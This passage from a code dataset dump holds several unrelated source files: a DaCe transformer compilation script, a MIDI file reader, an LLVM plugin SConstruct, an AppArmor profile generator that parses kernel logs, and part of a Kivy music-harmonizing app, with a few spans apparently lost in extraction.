SM=SM,\n SN=SN)\n\n # Residual connection.\n edattn_resid = dropout(edattn, edattn_dropout) + normed1\n normed2 = layer_norm(edattn_resid, norm2_scale, norm2_bias)\n # Feedforward network.\n ff = linear_with_bias(\n dropout(gelu(linear_with_bias(normed2, linear1_w, linear1_b)),\n linear1_dropout), linear2_w, linear2_b)\n # Residual connection.\n ff_resid = dropout(ff, ff_dropout) + normed2\n normed3 = layer_norm(ff_resid, norm3_scale, norm3_bias)\n return normed3\n\n\nif __name__ == '__main__':\n # B = 2\n # H = 16\n # P = 64\n # N = P * H\n # SM, SN = 512, 512\n # hidden = 4 * N\n from dace.transformation.dataflow import MapFusion\n from dace.transformation.interstate import StateFusion\n\n # dace.Config.set('optimizer',\n # 'automatic_strict_transformations',\n # value=False)\n # dace.Config.set('optimizer',\n # 'automatic_strict_transformation',\n # value=False)\n\n sdfg = mha_forward.to_sdfg()\n #sdfg.apply_transformations_repeated([StateFusion])\n sdfg.save('mha3.sdfg')\n\n esdfg = encoder.to_sdfg() #strict=False)\n #esdfg.apply_transformations_repeated([StateFusion, MergeSourceSinkArrays])\n #esdfg.apply_strict_transformations()\n #esdfg.apply_transformations_repeated(MapFusion)\n esdfg.save('encoder.sdfg')\n\n dsdfg = decoder.to_sdfg()\n dsdfg.apply_strict_transformations()\n dsdfg.apply_transformations_repeated(MapFusion)\n dsdfg.save('decoder-nonstrict.sdfg')\n\n desdfg = dec_with_enc_attn.to_sdfg()\n desdfg.apply_strict_transformations()\n desdfg.apply_transformations_repeated(MapFusion)\n desdfg.save('decoder_encattn.sdfg')\n\n # Remove duplicate CUBLAS creation code. TODO: Use library nodes instead\n cublas_found = False\n for node, parent in desdfg.all_nodes_recursive():\n if isinstance(node, dace.nodes.Tasklet):\n if 'cublasHandle_t' in node.code_global:\n if cublas_found:\n node.code_global = ''\n node.code_init = ''\n node.code_exit = ''\n cublas_found = True\n\n # For compilation, ensure we link with cublas\n if os.name == 'nt':\n dace.Config.append('compiler', 'cpu', 'libs', value='cublas.lib')\n else:\n dace.Config.append('compiler', 'cpu', 'libs', value='libcublas.so')\n\n esdfg.compile(optimizer=False)\n dsdfg.compile(optimizer=False)\n desdfg.compile(optimizer=False)\n","sub_path":"substation/transformer_sdfg.py","file_name":"transformer_sdfg.py","file_ext":"py","file_size_in_byte":13570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"317196622","text":"\"\"\"\nAn incomplete MIDI file reader.\n\nReads most MIDI files, but fails with others.\n\nTodo:\n - return MetaMessages along with Messages?\n - join sysex messages (0xf0...0xf7, 0xf7...0xf7, ...)\n - handle the too short files listed below:\n\n mid2/Portsmouth.mid\n mid1/acso3op2.mid\n\nReferences:\n\nhttp://www.sonicspot.com/guide/midifiles.html\nhttp://www.ccarh.org/courses/253/assignment/midifile/\nhttps://code.google.com/p/binasc/wiki/mainpage\nhttp://stackoverflow.com/questions/2984608/midi-delta-time\nhttp://www.recordingblogs.com/sa/tabid/82/EntryId/44/MIDI-Part-XIII-Delta-time-a\nhttp://www.sonicspot.com/guide/midifiles.html\n\"\"\"\n\nfrom __future__ import print_function\nimport sys\nimport mido\nfrom collections import deque\nfrom .messages import BaseMessage\n\nclass ByteReader(object):\n def __init__(self, stream):\n self.stream = stream\n self.data = deque()\n\n for line in stream:\n self.data.extend(bytearray(line))\n\n self._pos = 0\n\n def read_list(self, n):\n return [self.read_byte() for _ in range(n)]\n\n def read_bytes(self, n):\n return bytes(self.read_list(n))\n\n def read_bytearray(self, n):\n return bytearray(self.read_list(n))\n\n def read_byte(self):\n \"\"\"Get the next byte from.\"\"\"\n try:\n self._pos += 1\n return self.data.popleft()\n except IndexError:\n raise EOFError('end of file reached')\n\n def put_back_byte(self, byte):\n \"\"\"Put a byte back.\n\n This can be used for look-ahead.\"\"\"\n self.data.appendleft(byte)\n self._pos -= 1\n\n def tell(self):\n return self._pos\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, traceback):\n return False\n\n def __iter__(self):\n while 1:\n yield self.data.popleft()\n\n\ndef dbg(*args):\n print(*args)\n\n\ndef dbg2(*args):\n print(*args)\n\n\nclass FileReader(ByteReader):\n def read_byte(self):\n byte = ByteReader.read_byte(self)\n # dbg('{:02x} @ {:02x}'.format(byte, self.tell()))\n return byte\n\n def put_back_byte(self, byte):\n byte = ByteReader.put_byte_back(self, byte)\n # dbg('{:02x} put back'.format(byte))\n\n def read_short(self):\n a, b = [self.read_byte() for i in range(2)]\n return a << 8 | b\n\n def read_long(self):\n a, b, c, d = [self.read_byte() for i in range(4)]\n return a << 24 | b << 16 | c << 8 | d\n\n\nclass EndOfTrack(IOError):\n pass\n\n\nclass MetaMessage(BaseMessage):\n def __init__(self, type, data):\n self.type = 'meta'\n self.meta_type = type\n self.data = data\n self.time = 0\n\n def __repr__(self):\n return ''.format(\n self.meta_type, self.data, self.time)\n\n\nclass MidiFile:\n def __init__(self, filename):\n self.filename = filename\n self.tracks = []\n self._current_track = []\n self._running_status = None\n\n with FileReader(open(filename, 'rb')) as self.file:\n # Read header (16 bytes)\n magic = self.file.read_bytearray(4)\n if not magic == bytearray(b'MThd'):\n # Todo: raise some other error?\n raise ValueError('not a MIDI file')\n\n header_size = self.file.read_long()\n\n self.file_format = self.file.read_short()\n self.number_of_tracks = self.file.read_short()\n self.ticks_per_quarter_note = self.file.read_short()\n\n # dbg('--- File format: {}'.format(self.file_format))\n\n self._read_tracks()\n \n def _print_tracks(self):\n for i, track in enumerate(self.tracks):\n print('=== Track {}'.format(i))\n for event in track:\n print(' ', repr(event))\n\n def _read_delta_time(self):\n delta = 0\n\n while 1:\n byte = self.file.read_byte()\n delta = (delta << 7) | (byte & 0x7)\n if not byte & 0x80:\n break\n\n # dbg(' delta time', delta)\n return delta\n\n def _read_meta_event(self):\n type = self.file.read_byte()\n length = self.file.read_byte()\n data = self.file.read_bytes(length)\n\n # dbg(' meta event {:02x} {} {!r}'.format(type, length, data))\n event = MetaMessage(type, data)\n if type == 0x2f:\n # dbg(' found end of track')\n raise EndOfTrack('end of track found')\n\n return event\n\n\n def _read_message(self, status_byte):\n # dbg('+')\n\n # Todo: not all messages have running status\n if status_byte < 0x80:\n # dbg(' --- {}'.format('running status'))\n if self._running_status is None:\n # dbg(' *** {}'.format('no previous status byte!'))\n return\n status_byte = self._running_status\n # self.file.put_back_byte(status_byte)\n else:\n self._running_status = status_byte\n\n try:\n spec = mido.messages.get_spec(status_byte)\n except LookupError:\n # dbg2(' *** unknown status byte {:02x}'.format(status_byte))\n sys.exit(1)\n\n bytes = [status_byte]\n\n for i in range(spec.length - 1):\n bytes.append(self.file.read_byte())\n\n # dbg(' bytes for message: {}'.format(bytes))\n\n # message = mido.parse(bytes)\n message = build_message(spec, bytes)\n # dbg(' {}'.format(message))\n\n return message\n\n\n def _read_sysex(self):\n length = self.file.read_byte()\n data = self.file.read_list(length)\n if data[-1] == 0xf7:\n data = data[:-1]\n\n message = mido.Message('sysex', data=data)\n # dbg(' {}'.format(message))\n\n return message\n\n\n def _read_event(self, delta):\n status_byte = self.file.read_byte()\n\n if status_byte == 0xff:\n event = self._read_meta_event()\n\n elif status_byte == 0xf0:\n event =self._read_sysex()\n\n elif status_byte == 0xf7:\n event = self._read_sysex() # Todo: continuation of previous sysex\n\n else:\n event = self._read_message(status_byte)\n\n if event is not None:\n event.time = delta\n self._current_track.append(event)\n\n\n def _read_track(self):\n magic = self.file.read_bytearray(4)\n if magic != bytearray(b'MTrk'):\n raise ValueError(\"track doesn't start with 'MTrk'\")\n\n length = self.file.read_long() # Ignore this.\n\n # dbg('******** found track of length', length)\n\n self._current_track = []\n self._running_status = None\n\n start = self.file.tell()\n\n while 1:\n try:\n # End of track reached\n if self.file.tell() - start == length:\n break\n\n # dbg(' !{} {}'.format(length, self.file.tell() - start))\n delta = self._read_delta_time()\n self._read_event (delta)\n except EndOfTrack:\n break\n\n self.tracks.append(self._current_track)\n self._current_track = []\n\n def _read_tracks(self):\n try:\n for i in range(self.number_of_tracks):\n self._read_track()\n except EOFError:\n # dbg(' wrong number of tracks (reached end of file')\n # dbg(' while reading track ')\n # dbg(' {} of {})'.format(i, self.number_of_tracks))\n pass\n # print(self.file.tell())\n\n# mid1/acso3op2.mid:\n# 00008b0: 00c0 0604 b05b 5400 5d5d 8168 0a58 0307\n# (prog )(control )(? ... )(note off)(? )\n#\n# 00008c0: 7f81 4a90 4057 0043 5901 4854 1940 0001\n# (off ? ) (? )\n","sub_path":"mido/midifiles.py","file_name":"midifiles.py","file_ext":"py","file_size_in_byte":7798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"192482176","text":"########################################################################\n#\n# path to Tristan Ravitch's iiglue analyzer\n\nfrom os import access, environ, X_OK\nfrom SCons.Script import *\n\ndef pathIsExecutable(key, val, env):\n found = env.WhereIs(val)\n if found: val = found\n PathVariable.PathIsFile(key, val, env)\n if not access(val, X_OK):\n raise SCons.Errors.UserError('Path for option %s is not executable: %s' % (key, val))\n\ndef pathIsOptionalExecutable(key, val, env):\n if val:\n pathIsExecutable(key, val, env)\n\nvariables = Variables(['.scons-options'], ARGUMENTS)\nvariables.Add(PathVariable('IIGLUE', 'Path to iiglue executable', '/p/polyglot/public/bin/iiglue', pathIsOptionalExecutable))\n\ndefault = WhereIs('llvm-config', (\n '/p/polyglot/public/bin',\n '/usr/bin',\n))\nvariables.Add(PathVariable('LLVM_CONFIG', 'Path to llvm-config executable', default, pathIsExecutable))\n\n########################################################################\n#\n# common basis for all build environments\n#\n\nenv = Environment(\n tools=(\n 'default', # load first, so others can override\n 'bitcode',\n 'clang-analyzer',\n 'expect',\n 'iiglue',\n 'plugin',\n ),\n toolpath=(\n 'scons-tools',\n ),\n variables=variables,\n)\n\nHelp(variables.GenerateHelpText(env))\nvariables.Save('.scons-options', env)\n\n\n########################################################################\n#\n# LLVM configuration\n#\n\nfrom distutils.version import StrictVersion\n\ndef llvm_version(context):\n context.Message('checking LLVM version ... ')\n succeeded, output = context.TryAction('$LLVM_CONFIG --version >$TARGET')\n if succeeded:\n result = output.rstrip('\\n')\n context.env['llvm_version'] = result\n context.Result(result)\n return result\n else:\n context.Result('failed')\n context.env.Exit(1)\n\ndef llvm_bindir(context):\n context.Message('checking LLVM executables ... ')\n succeeded, output = context.TryAction('$LLVM_CONFIG --bindir >$TARGET')\n if succeeded:\n output = output.rstrip()\n context.env.PrependENVPath('PATH', output)\n context.Result(output)\n return output\n else:\n context.Result('failed')\n context.env.Exit(1)\n\nconf = Configure(env, custom_tests={\n 'LLVMVersion': llvm_version,\n 'LLVMBinDir': llvm_bindir,\n })\n\nconf.LLVMVersion()\nconf.LLVMBinDir()\nenv = conf.Finish()\n\n\n########################################################################\n#\n# build environment for compiling LLVM plugins\n#\n\npenv = env.Clone(\n CXXFLAGS=('-Wall', '-Wextra', '-Werror', '-std=c++11'),\n CPPPATH='/unsup/boost-1.55.0/include',\n INCPREFIX='-isystem ',\n LIBS=('LLVM-$llvm_version',),\n)\n\npenv.PrependENVPath('PATH', '/s/gcc-4.9.0/bin')\npenv.ParseConfig('$LLVM_CONFIG --cxxflags --ldflags')\npenv.AppendUnique(\n CCFLAGS=(\n '-fexceptions',\n '-frtti',\n ), delete_existing=True)\n\nplugin, = penv.SharedLibrary('CArrayIntrospection', (\n 'BacktrackPhiNodes.cc',\n 'IIGlueReader.cc',\n 'FindSentinels.cc',\n 'NullAnnotator.cc',\n))\n\nenv['plugin'] = plugin\n\nAlias('plugin', plugin)\n\n\n########################################################################\n#\n# compilation database for use with various Clang LibTooling tools\n#\n\n\nimport json\n\ndef compilation_database(env, topdir):\n for obj in plugin.sources:\n src, = obj.sources\n yield {\n 'directory': topdir,\n 'file': src.path,\n 'command': env.subst('$SHCXXCOM', target=obj, source=src),\n }\n\ndef stash_compile_commands(target, source, env):\n sconstruct, topdir = source\n target, = target\n commands = list(compilation_database(env, topdir.read()))\n json.dump(commands, open(str(target), 'w'), indent=2)\n\npenv.Command('compile_commands.json', ('SConstruct', Value(Dir('#').abspath)), stash_compile_commands)\n\n\n########################################################################\n#\n# subdirectories\n#\n\nSConscript(dirs='tests', exports='env')\n\n\n# Local variables:\n# flycheck-flake8rc: \"scons-flake8.ini\"\n# End:\n","sub_path":"SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":4153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"644120962","text":"\"\"\"\nApparmor Profile Generator\nby PG @ Synology\nReleased Under the MIT License\n\"\"\"\n\nconfig_webAPI_only = False\nconfig_use_filter = True\nconfig_log_path = '/var/log/kern.log'\nfilter_list = ['operation=\"profile_remove\"', 'operation=\"profile_load\"']\n\n\nimport re,fileinput,sys\n\nfilter_list_p = []\nfor filter in filter_list:\n\tfilter_list_p.append(re.compile(filter))\n\nif config_webAPI_only:\n\tlist_all_p = '([A-Za-z0-9\\.]+)' + '(/[^\\\"]*)?\"'\n\tprofile_base_p = 'profile=\"/usr/syno/synoman/webapi/entry.cgi//'\nelse:\n\tlist_all_p = '([^\\\"]+)' + '\"'\n\tprofile_base_p = 'profile=\"'\n\ndef analyze(target, lines):\n\trule_p = re.compile('name=\"([^\\\"]+)\".+requested_mask=\"([A-Za-z]+)\"')\n\tcapability_p = re.compile('capname=\"([^\\\"]+)\"')\n\tnetwork_p = re.compile('family=\"([a-z]+)\" sock_type=\"([a-z]+)\"')\n\t#target = 'SYNO.Core.Security.DSM'\n\t\n\ttarget_p = re.compile(profile_base_p + re.escape(target) + '(/[^\\\"]*)?\"')\n\ttarget_grep_p = re.compile(re.escape(target))\n\tdata = {}\n\tcapability_data = {}\n\tnetwork_data = {}\n\tparse_fail = []\n\tcnt = 0\n\thit_cnt = 0\n\n\tfor line in lines:\n\t\tcnt = cnt + 1\n\n\t\tif not target_grep_p.search(line):\n\t\t\tcontinue\n\t\tresult = rule_p.search(line)\n\t\tcapability_result = capability_p.search(line)\n\t\tnetwork_result = network_p.search(line)\n\t\tif not (result or capability_result or network_result):\n\t\t\tparse_fail.append(line)\n\t\t\tcontinue\n\n\t\thit_cnt = hit_cnt + 1\n\n\t\tif result:\n\t\t\tpath = result.group(1)\n\t\t\trequested_mask = result.group(2)\n\t\t\tif path not in data:\n\t\t\t\tdata[path] = {}\n\t\t\tif requested_mask not in data[path]:\n\t\t\t\tdata[path][requested_mask] = {}\n\t\t\t\tdata[path][requested_mask]['count'] = 0;\n\t\t\t\tdata[path][requested_mask]['cmd'] = []; \n\t\t\tdata[path][requested_mask]['count'] = data[path][requested_mask]['count'] + 1\n\t\telif capability_result:\n\t\t\tcapibility_name = capability_result.group(1)\n\t\t\tif capibility_name not in capability_data:\n\t\t\t\tcapability_data[capibility_name] = 0;\n\t\t\tcapability_data[capibility_name] = capability_data[capibility_name] + 1\n\t\telif network_result:\n\t\t\tfamily = network_result.group(1)\n\t\t\tsock_type = network_result.group(2)\n\t\t\tkey = (family, sock_type)\n\t\t\tif key not in network_data:\n\t\t\t\tnetwork_data[key] = 0\n\t\t\tnetwork_data[key] = network_data[key] + 1\n\t\telse :\n\t\t\tprint('SHOUD NOT BE HERE, call PG plz')\n\n\tprint('\\033[1;33m{0} {1} matched \\033[0m'.format(target, hit_cnt, cnt))\n\n\tfor path in sorted(data):\n\t\toutput = []\n\t\tfor mask in data[path]:\n\t\t\toutput.append(mask)\n\t\tsys.stdout.write('{0:50}'.format(path))\n\t\tfor i in output:\n\t\t\tsys.stdout.write(' ' + i)\n\t\tprint(',')\n\tfor name in sorted(capability_data):\n\t\tprint('capability {0},'.format(name))\n\tfor key in sorted(network_data):\n\t\tprint('network {0:6}{1},'.format(key[0], key[1]))\n\n\tif len(parse_fail) > 0:\n\t\tprint('\\033[0;31mUntracked List\\033[0;31m')\n\t\tfor line in parse_fail:\n\t\t\tprint('\\033[0;31m {0} \\033[0m'.format(line))\n\ndef list_profiles(lines):\n\tdata = {}\n\tret = []\n\ttarget_p = re.compile(profile_base_p + list_all_p)\n\tfor line in lines:\n\t\tresult = target_p.search(line)\n\t\tif not result:\n\t\t\tcontinue\n\t\tdata[result.group(1)] = 1\n\tfor webapi in sorted(data):\n\t\tret.append(webapi)\n\treturn ret\n\t\t#print(result.group(2))\n\nif __name__ == '__main__':\n\tlines = []\n\tfilter_cnt = 0\n\n\tif len(sys.argv) < 2:\n\t\tprint('Usage : \\n {0} --all \\n {0} --list \\n {0} webapi'.format(__file__))\n\t\texit()\n\n\tdef chk_filter(line):\n\t\tfor p in filter_list_p:\n\t\t\tif p.search(line):\n\t\t\t\treturn True\n\t\treturn False\n\n\tfor line in fileinput.input(config_log_path):\n\t\tif config_use_filter:\n\t\t\tif chk_filter(line):\n\t\t\t\tfilter_cnt = filter_cnt + 1\n\t\t\t\tcontinue\n\t\tlines.append(line)\n\tprint('\\033[0;32mlog size: {0} lines, {1} were removed by filter\\033[0m'.format(len(lines), filter_cnt))\n\n\t\n\t\n\tif sys.argv[1] == '--list':\n\t\tprint(list_profiles(lines))\n\t\texit()\n\n\tif sys.argv[1] == '--all':\n\t\tprofile_list = list_profiles(lines)\n\t\tfor profile in profile_list:\n\t\t\tanalyze(profile, lines)\n\t\tprint(\"\\033[0;32m============================================================\\033[0m\")\n\t\texit()\n\n\tanalyze(sys.argv[1], lines)\n","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"438507988","text":"#!/usr/bin/env python3\n\nimport sys\nimport os\nsys.path.insert(0, os.path.abspath('..'))\n\nfrom kivy import metrics\nfrom kivy.uix.button import Button\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.graphics import Color, Ellipse\nfrom kivy.clock import Clock as kivyClock\nfrom kivy.uix.image import Image\nfrom kivy.core.window import Window\nfrom kivy.uix.popup import Popup\nfrom kivy.app import App\nfrom kivy.uix.gridlayout import GridLayout \nfrom kivy.uix.button import Button \nfrom kivy.uix.dropdown import DropDown \n\nfrom common.screen import ScreenManager, Screen\nfrom common.gfxutil import topleft_label, CEllipse, KFAnim, AnimGroup, CLabelRect\nfrom common.core import BaseWidget, run\nfrom common.metro import Metronome\nfrom common.wavesrc import WaveFile\nfrom common.clock import Clock, SimpleTempoMap, AudioScheduler, kTicksPerQuarter, quantize_tick_up\nfrom kivy.graphics.instructions import InstructionGroup\nfrom kivy.graphics import Color, Ellipse, Line, Rectangle\nfrom kivy.uix.boxlayout import BoxLayout \nfrom kivy.uix.label import Label\nfrom kivy.uix.behaviors import ButtonBehavior, ToggleButtonBehavior\nfrom ashika_play_area.input_demo import *\n\nfrom graphics import Scene\n\n \n## not necessary while using .kv file \nfrom kivy.uix.checkbox import CheckBox \n# To do some manupulation on window impoet window \nfrom kivy.core.window import Window \nfrom kivy.factory import Factory\nfrom kivy.config import Config\nConfig.set('graphics', 'resizable', False)\nConfig.set('graphics', 'height', '450')\nConfig.set('graphics', 'width', '800')\n\n\nfont_sz = metrics.pt(20)\nbutton_sz = metrics.pt(100)\nTHEME = {\n \"red\": Color(1,0,0),\n \"dark-red\": Color(.5,0,0),\n \"white\": Color(1, 1, 1),\n \"black\": Color(0, 0, 0),\n}\n\n\nclass Checkboxes():\n def __init__(self, labels_and_defaults):\n self.labels = {}\n self.init_active = {}\n for group in labels_and_defaults:\n labels, index_active = labels_and_defaults[group]\n self.labels[group] = labels\n self.init_active[group] = index_active\n\n def get_labels_dict(self):\n return self.labels.copy()\n\n def get_init_active_dict(self):\n return self.init_active.copy()\n\n\n##################### INSTRUMENTS!! #########################\n# {group: (labels_list, default_index_selected)}\nINSTRUMENT_CHECKBOXES = Checkboxes({\n \"high voice\": ([\"piano\", \"violin\", \"guitar\", \"flute\"], 0),\n \"mid voice\": ([\"piano\", \"viola\", \"guitar\"], 0),\n \"low voice\": ([\"piano\", \"cello\", \"bass\"], 0)\n})\nALL_PIANO_SELECTED = {\n \"high voice\": 0,\n \"mid voice\": 0,\n \"low voice\": 0\n}\nORCHESTRA = {\n \"high voice\": 1,\n \"mid voice\": 1,\n \"low voice\": 1\n}\nPOP = {\n \"high voice\": 0,\n \"mid voice\": 2,\n \"low voice\": 2\n}\n# ... and so on! keep filling this out\n# use set_checkboxes(ORCHESTRA) to set checkboxes\n##############################################################\n\n######################## GENRES!! ############################\nGENRE_CHECKBOXES = Checkboxes({\n \"GENRE\": ([\"classical\", \"pop\", \"Coming\\nsoon!\"], 0)\n})\n##############################################################\n\nclass StartPopup(Popup):\n def __init__(self, **kwargs):\n super(StartPopup, self).__init__(**kwargs)\n\n\nclass VolumePopup(Popup):\n def __init__(self, callback):\n super(VolumePopup, self).__init__()\n self.slider_callback = callback # takes in (slider_id, value)\n\n\n\nclass CheckboxPopup(Popup):\n def __init__(self, callback, title, checkboxes):\n super(CheckboxPopup, self).__init__()\n self.instrument_callback = callback\n \n self.title = title\n self.checkbox_labels = checkboxes.get_labels_dict()\n\n # set up checkboxes\n self.checkboxes = {}\n max_items = -1 # for checkbox layout\n for group in self.checkbox_labels:\n max_items = max(len(self.checkbox_labels[group]), max_items)\n self.checkboxes[group] = []\n\n # creating the checkbox layout\n self.layout = GridLayout(cols = (max_items+1))\n for i in self.checkbox_labels:\n self.layout.add_widget(SimpleLabel(text=i))\n checkbox_list = self.checkbox_labels[i]\n\n # fills in checkboxes and labels\n for j in range(len(checkbox_list)):\n box_layout = BoxLayout()\n item = checkbox_list[j]\n current_checkbox = CheckBox(group = i)\n current_checkbox.bind(on_press=self.on_checkbox_active)\n self.checkboxes[i].append(current_checkbox)\n box_layout.add_widget(current_checkbox)\n box_layout.add_widget(SimpleLabel(text=item))\n self.layout.add_widget(box_layout)\n\n # creates fillers\n for j in range(max_items-len(checkbox_list)):\n self.layout.add_widget(BoxLayout())\n self.content = self.layout\n\n\n # sets the current choices as active\n self.set_checkboxes(checkboxes.get_init_active_dict())\n \n def set_checkboxes(self, option_dict):\n '''\n Takes in a dictionary of group: index\n looks like self.init_active\n sets new items as active\n '''\n for group in option_dict:\n new_index = option_dict[group]\n group_checkboxes = self.checkboxes[group]\n group_checkboxes[new_index]._do_press()\n\n def on_checkbox_active(self, checkbox_instance):\n if checkbox_instance.active:\n group = checkbox_instance.group\n index = self.checkboxes[group].index(checkbox_instance)\n label = self.checkbox_labels[group][index]\n print(group, label)\n self.instrument_callback(label, group)\n else:\n checkbox_instance._do_press()\n \n\nclass SimpleLabel(Label):\n pass\n\n\nclass StoragePopup(Popup):\n def __init__(self, get_wave_callback, set_wave_callback):\n super(StoragePopup, self).__init__()\n self.get_wave_callback = get_wave_callback\n self.set_wave_callback = set_wave_callback\n self.wave_gens = {}\n\n # on record button press, select a wave generator\n # on save button press, set a wave generator to current wave\n # on play button press, set live wave to selected button\n \n def on_play_button_press(self):\n current_index_selected = self.get_selected_index()\n if current_index_selected < 0:\n return\n if current_index_selected not in self.wave_gens.keys():\n return\n # get the saved recording\n new_wave_gen, sequencers = self.wave_gens[current_index_selected]\n # replace the live wave in the larger scene\n self.set_wave_callback(new_wave_gen, sequencers)\n\n def on_save_button_press(self):\n current_index_selected = self.get_selected_index()\n if current_index_selected<0:\n return\n\n # save the current live wave into self.wave_gens[current_index_selected]\n current_wave_and_seqs = self.get_wave_callback()\n if not current_wave_and_seqs:\n return\n self.wave_gens[current_index_selected] = current_wave_and_seqs\n\n # indicate whether a wave generator is saved at a certain index\n\n\n def get_selected_index(self):\n # gets the index of the button which is presently selected\n # returns -1 if no button is selected\n widgets = ToggleButtonBehavior.get_widgets('storage')\n index = -1\n for idx in range(len(widgets)):\n widget = widgets[idx]\n if widget.state == \"down\":\n index = idx\n return index\n\n \n\n\n\nclass RecordPopup(Popup):\n def __init__(self, record_callback, play_callback):\n super(RecordPopup, self).__init__()\n self.record_callback = record_callback\n self.play_callback = play_callback\n self.mic_meter = MeterDisplay((140, 90), 100, (-96, 0), (.1, .9, .3))\n self.mic_graph = GraphDisplay((200, 90), 100, 160, (-96, 0), (.1, .9, .3))\n\n self.pitch_meter = MeterDisplay(\n (140, 210), 100, (30, 90), (.9, .1, .3))\n self.pitch_graph = GraphDisplay(\n (200, 210), 100, 160, (30, 90), (.9, .1, .3))\n\n self.canvas.add(self.mic_meter)\n self.canvas.add(self.mic_graph)\n self.canvas.add(self.pitch_meter)\n self.canvas.add(self.pitch_graph)\n \n\nclass IntroScreen(BaseWidget):\n image = \"data/bedroom.jpg\"\n def __init__(self):\n super(IntroScreen, self).__init__()\n self.genre_popup = CheckboxPopup(self.genre_callback, \"GENRE\", GENRE_CHECKBOXES)\n self.volume_popup = VolumePopup(self.slider_callback)\n self.record_popup = RecordPopup(self.init_recording, self.toggle_playing)\n self.instruments_popup = CheckboxPopup(self.instrument_callback, \"INSTRUMENTS\", INSTRUMENT_CHECKBOXES)\n self.storage_popup = StoragePopup(self.get_live_wave, self.set_live_wave)\n self.audio = Audio(2, input_func=self.receive_audio,num_input_channels=1)\n self.mixer = Mixer()\n self.audio.set_generator(self.mixer)\n self.pitch = PitchDetector()\n self.recorder = VoiceAudioWriter('data')\n self.playing = False\n self.recording = False\n self.cmd = None\n\n self.scene = Scene()\n self.add_widget(self.scene)\n self.scene.foreground.radio.set_callback(self.genre_popup.open)\n self.scene.foreground.amp.set_callback(self.volume_popup.open)\n self.scene.foreground.mic.set_callback(self.record_popup.open)\n self.scene.foreground.guitar.set_callback(self.instruments_popup.open)\n self.scene.foreground.storage.set_callback(self.storage_popup.open)\n\n self.cur_pitch = 0\n self.midi_notes = None\n \n self.bass = [((40,60),(0,0)),((43,64),(0,42)),((28,48),(0,33))]\n self.tenor = [((52,69),(0,0)),((52,69),(0,41)),((45,64),(0,26))]\n self.alto = [((57,77),(0,0)),((60,79),(0,40)),((52,72),(0,29)),((67,86),(0,73))]\n self.instruments = [self.bass,self.tenor,self.alto]\n self.genre = 'pop'\n \n self.indices = [0,0,0]\n\n # Note Scheduler\n self.synth = Synth('data/FluidR3_GM.sf2')\n\n # create TempoMap, AudioScheduler\n self.tempo_map = SimpleTempoMap(120)\n self.sched = AudioScheduler(self.tempo_map)\n self.metro = Metronome(self.sched, self.synth)\n self.start_tick = None\n\n # connect scheduler into audio system\n self.mixer.add(self.sched)\n self.sched.set_generator(self.synth)\n\n # Note Sequencers\n self.seq = [None, None, None]\n\n # live Generator\n self.live_wave = None\n\n # current .wav file\n self.current_wave_file = None\n \n def genre_callback(self, value, label):\n self.genre = value\n if value == 'classical':\n self.instruments_popup.set_checkboxes(ORCHESTRA)\n self.indices = [1,1,1]\n self.instrument_callback(None, None)\n if value == 'pop':\n self.instruments_popup.set_checkboxes(POP)\n self.indices = [2,2,0]\n self.instrument_callback(None, None)\n \n def instrument_callback(self, value, label):\n if label == 'high voice':\n self.indices[2] = ['piano','violin','guitar','flute'].index(value)\n if label == 'mid voice':\n self.indices[1] = ['piano','viola','guitar'].index(value)\n if label == 'low voice':\n self.indices[0] = ['piano','cello','bass'].index(value)\n if self.live_wave is not None:\n for i in self.seq:\n i.stop()\n self.live_wave.reset()\n #reharmonize and update NoteSequencers\n duration_midi = harmony.harmonize(self.midi_notes, self.genre, brange = self.bass[self.indices[0]][0],\n trange = self.tenor[self.indices[1]][0],\n arange = self.alto[self.indices[2]][0])\n tempo = self.tempo_map.get_tempo()\n multiplier = 1/60*tempo*480\n converted_midi_duration = [[(i*multiplier, j)\n for i, j in k] for k in duration_midi]\n \n for i in range(3):\n self.seq[i] = NoteSequencer(\n self.sched, self.synth, i+1, self.instruments[i][self.indices[i]][1], \n converted_midi_duration[i+1], self.scene.add_note_sprite, True)\n if self.playing:\n self.play_recording(1)\n \n def slider_callback(self, voice, value):\n val = int(value)\n idx = [ \"bass\",\"tenor\", \"alto\", \"melody\"].index(voice)+1\n if idx < 4:\n self.synth.cc(idx, 7, val)\n else:\n if self.live_wave:\n self.live_wave.set_gain(val/100)\n\n def on_update(self):\n self.audio.on_update()\n self.scene.on_update()\n\n def on_key_down(self, keycode, modifiers):\n if keycode[1] == 'm':\n self.metro.toggle()\n bpm_adj = lookup(keycode[1], ('up', 'down'), (10, -10))\n if bpm_adj and not self.playing and not self.recording:\n new_tempo = max(self.tempo_map.get_tempo() + bpm_adj, 30)\n self.tempo_map.set_tempo(new_tempo, self.sched.get_time())\n\n def receive_audio(self, frames, num_channels):\n assert(num_channels == 1)\n\n # Microphone volume level, take RMS, convert to dB.\n # display on meter and graph\n rms = np.sqrt(np.mean(frames ** 2))\n rms = np.clip(rms, 1e-10, 1) # don't want log(0)\n db = 20 * np.log10(rms) # convert from amplitude to decibels\n self.record_popup.mic_meter.set(db)\n self.record_popup.mic_graph.add_point(db)\n\n # pitch detection: get pitch and display on meter and graph\n self.cur_pitch = self.pitch.write(frames)\n self.record_popup.pitch_meter.set(self.cur_pitch)\n self.record_popup.pitch_graph.add_point(self.cur_pitch)\n\n # record audio\n self.recorder.add_audio(frames, num_channels)\n\n\n def init_recording(self):\n if not self.recording:\n self.start_tick = self.sched.get_tick()\n data = self.recorder.toggle()\n if not data:\n self.recording = True\n if self.live_wave is not None:\n try:\n self.mixer.remove(self.live_wave)\n except:\n pass\n for i in self.seq:\n if i is not None:\n i.stop()\n self.playing = False\n else:\n self.recording = False\n stop_tick = self.sched.get_tick()\n wave_gen, filename, duration_midi = data\n self.current_wave_file = WaveFile(filename)\n #ignore short notes\n i=0\n while i 0:\n tot = 0\n times = {}\n while tot < curr_beat and ind < len(ticks):\n left = ticks[ind][0] - ticks_passed\n if left > curr_beat - tot:\n ticks_passed += curr_beat-tot\n if ticks[ind][1] in times:\n 